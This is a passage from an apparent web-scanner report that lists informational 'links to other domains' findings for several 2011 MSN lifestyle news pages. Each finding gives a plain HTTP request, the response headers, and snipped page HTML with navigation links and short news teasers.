<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406672&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FFamous-escapes.aspx%3Fcp-documentid%3D27422805%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&amp;form=msnhal"><strong>
...[SNIP]...
<div>As long as there have been ways to incarcerate people -- whether <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=prisons&amp;form=msnhal">behind bars</a> or <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=slavery&amp;form=msnhal">through immoral ownership</a> -- there have been escapes. Some are unsuccessful, such as the recent case of a 20-year-old man who jumped out of a moving police car, pictured here. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Nicholas+Duffy+friction+burns+to+hands&amp;form=msnhal">Find out</a> what his injuries were.) And others are daring and brave and are among some of the most <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&amp;form=msnhal">famous escapes in history</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.324. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Mom-kills-teens.aspx?cp-documentid=27465807 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:12 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fff6a85e320f450ca15afa15de89cce2; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B6089F17DDD649A4A9961B27ECEBF7C0; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:12 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406692&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FMom-kills-teens.aspx%3Fcp-documentid%3D27465807&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&amp;form=msnpop"><strong>
...[SNIP]...
<div>Florida police say Julie Powers Schenecker admitted to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&amp;form=msnpop">killing her teen son and daughter</a> this week... She shot her son first for 'talking back' while she was driving (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+shot+son+soccer&amp;form=msnpop">where were they going?</a>
...[SNIP]...
<div>Some people say Schenecker's case is similar <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=susan+smith&amp;form=msnpop">to another mother's</a>
...[SNIP]...
<div>Police found Schenecker at her Tampa home <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+blood+on+the+back+porch&amp;form=msnpop">in an odd state</a>
...[SNIP]...
<div>Her husband <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+husband+middle+east&amp;form=msnpop">was not home</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.325. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Mom-kills-teens.aspx?cp-documentid=27465807 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6f494a921fdc485c8843f5bbaf4f4e90; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AB17CF22AE0A44B785FDC70A0F4F0244; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345073&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FMom-kills-teens.aspx%3Fcp-documentid%3D27465807&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&amp;form=msnpop"><strong>
...[SNIP]...
<div>Florida police say Julie Powers Schenecker admitted to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&amp;form=msnpop">killing her teen son and daughter</a> this week... She shot her son first for 'talking back' while she was driving (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+shot+son+soccer&amp;form=msnpop">where were they going?</a>
...[SNIP]...
<div>Some people say Schenecker's case is similar <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=susan+smith&amp;form=msnpop">to another mother's</a>
...[SNIP]...
<div>Police found Schenecker at her Tampa home <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+blood+on+the+back+porch&amp;form=msnpop">in an odd state</a>
...[SNIP]...
<div>Her husband <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+husband+middle+east&amp;form=msnpop">was not home</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.326. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Nathan-Woods-dies.aspx?cp-documentid=27467027 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8b410cf2be0f4ee8ad921b52aa54a346; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A0389BD7DD28409BB2107D75F4993368; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345068&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FNathan-Woods-dies.aspx%3Fcp-documentid%3D27467027&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Two-time World Off-Road Champion <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&amp;go=&amp;form=msnpop">Nathan Woods died</a> Friday after a crash while practicing in California (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=worcs+motorcycle+racing&amp;FORM=msnpop">for what race?</a>
...[SNIP]...
<div>Watch video of Woods <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/nathan-woods-on-a-husaberg-for-2010-worcs/4dd9d135770901d9f3694dd9d135770901d9f369-418410135638?q=nathan+woods&amp;FROM=LKVR5&amp;GT1=LKVR5&amp;FORM=msnpop">prepping for a race</a>
...[SNIP]...
<div>BMX rider <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tj+lavin+crash&amp;form=msnpop">TJ Lavin</a>
...[SNIP]...
<div>Find out which jobs are considered to be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=most+dangerous+jobs&amp;form=msnpop">the most dangerous</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.327. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Nathan-Woods-dies.aspx?cp-documentid=27467027 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a913943685be4a59a8ca853fd79de5c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F9FF5E73AFA943D3ABF505A8F607148F; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406687&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FNathan-Woods-dies.aspx%3Fcp-documentid%3D27467027&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Two-time World Off-Road Champion <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&amp;go=&amp;form=msnpop">Nathan Woods died</a> Friday after a crash while practicing in California (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=worcs+motorcycle+racing&amp;FORM=msnpop">for what race?</a>
...[SNIP]...
<div>Watch video of Woods <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/nathan-woods-on-a-husaberg-for-2010-worcs/4dd9d135770901d9f3694dd9d135770901d9f369-418410135638?q=nathan+woods&amp;FROM=LKVR5&amp;GT1=LKVR5&amp;FORM=msnpop">prepping for a race</a>
...[SNIP]...
<div>BMX rider <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tj+lavin+crash&amp;form=msnpop">TJ Lavin</a>
...[SNIP]...
<div>Find out which jobs are considered to be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=most+dangerous+jobs&amp;form=msnpop">the most dangerous</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.328. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:01 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
